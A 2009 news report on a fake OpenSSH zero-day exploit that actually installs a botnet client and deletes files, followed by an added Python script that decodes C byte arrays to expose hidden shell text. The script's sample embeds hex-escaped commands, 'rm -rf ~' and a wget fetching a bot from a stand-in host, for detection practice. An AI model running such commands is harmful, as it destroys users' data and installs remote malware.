Monday, July 20, 2009

Rogue OpenSSH 0-Day Exploit Damages Computers

The obfuscated code contains malicious instructions and creates a botnet

A fake exploit for a zero-day OpenSSH vulnerability, which was allegedly used in some high-profile attacks, has been circulating on the Internet recently. Compiling and running it is not a good idea, as the code contains instructions to install a botnet client and delete directories from the file system.

About two weeks ago, rumors of the existence of an undisclosed vulnerability in OpenSSH started spreading. A system log showing an attack in progress suggested that a group named "anti-sec" was in possession of an OpenSSH exploit called "Open0wn," which was being used to compromise Linux and FreeBSD servers.

Not long after, anti-sec took credit for an attack against ImageShack and positioned itself as an opponent of full disclosure and of the security industry. Security researchers eventually agreed that these compromises were most likely the result of brute-force attacks rather than the exploitation of an OpenSSH vulnerability.

Source code masquerading as the Open0wn exploit has been spotted on pastebin, as well as on other websites, over the past few days. The fake exploit carries three obfuscated code strings, defined as jmpcode[], shellcode[] and fbsd_shellcode[].
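Arrays like the three named above are ordinary C string literals assembled from \x escapes, so they can be decoded and read without compiling or running anything. The following Python script is an added example (not code from the article, and not the fake exploit itself): it pulls every `char name[] = "..."` array out of a source text, decodes the escapes, and labels each one as hidden shell text or opaque binary for a reviewer to look at; the source fragment embedded in it is constructed for the demonstration and is not the real Open0wn paste.

```python
import re

# Constructed sample in the shape of the fake exploit: C byte arrays whose
# "shellcode" is really an escaped shell command. Not the actual paste.
SAMPLE_SOURCE = r'''
char jmpcode[] = "\x72\x6d\x20\x2d\x72\x66\x20\x7e";
char shellcode[] = "\x77\x67\x65\x74\x20\x68\x74\x74\x70\x3a\x2f\x2f"
                   "\x65\x78\x61\x6d\x70\x6c\x65\x2e\x69\x6e\x76\x61"
                   "\x6c\x69\x64\x2f\x62\x6f\x74";
char fbsd_shellcode[] = "\x90\x90\x90\xcc";
'''

_ARRAY_RE = re.compile(r'char\s+(\w+)\s*\[\]\s*=\s*((?:"(?:[^"\\]|\\.)*"\s*)+);')
_LITERAL_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
_SIMPLE_ESC = {'n': b'\n', 't': b'\t', 'r': b'\r', '\\': b'\\', '"': b'"'}

def decode_c_literal(body):
    """Decode the inside of a C string literal (\\xHH, \\ooo, \\n ...) to bytes.
    Assumes a well-formed literal, as a compiler would also require."""
    i, out = 0, bytearray()
    while i < len(body):
        if body[i] != '\\':
            out += body[i].encode('latin-1'); i += 1; continue
        nxt = body[i + 1]
        if nxt == 'x':                       # hex escape, up to two digits here
            digits = re.match(r'[0-9a-fA-F]{1,2}', body[i + 2:]).group(0)
            out.append(int(digits, 16)); i += 2 + len(digits)
        elif nxt in '01234567':              # octal escape, up to three digits
            digits = re.match(r'[0-7]{1,3}', body[i + 1:]).group(0)
            out.append(int(digits, 8)); i += 1 + len(digits)
        else:
            out += _SIMPLE_ESC.get(nxt, nxt.encode('latin-1')); i += 2
    return bytes(out)

def extract_c_arrays(src):
    """Return {array_name: decoded bytes}; adjacent literals are concatenated as in C."""
    return {m.group(1): decode_c_literal(''.join(_LITERAL_RE.findall(m.group(2))))
            for m in _ARRAY_RE.finditer(src)}

def looks_like_command(blob):
    """Heuristic: mostly printable ASCII plus a shell-ish token means hidden text, not machine code."""
    printable = sum(32 <= b < 127 for b in blob)
    text = blob.decode('latin-1')
    return printable >= 0.9 * len(blob) and bool(
        re.search(r'\b(rm|wget|curl|sh|bash|chmod|perl|python)\b', text))

def triage(src):
    """Map each array to ('TEXT', decoded string) or ('BINARY', hex) for human review."""
    return {name: ('TEXT', blob.decode('latin-1')) if looks_like_command(blob)
            else ('BINARY', blob.hex())
            for name, blob in extract_c_arrays(src).items()}

if __name__ == '__main__':
    for name, (kind, value) in triage(SAMPLE_SOURCE).items():
        print(f'{name:16} {kind:6} {value}')
```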
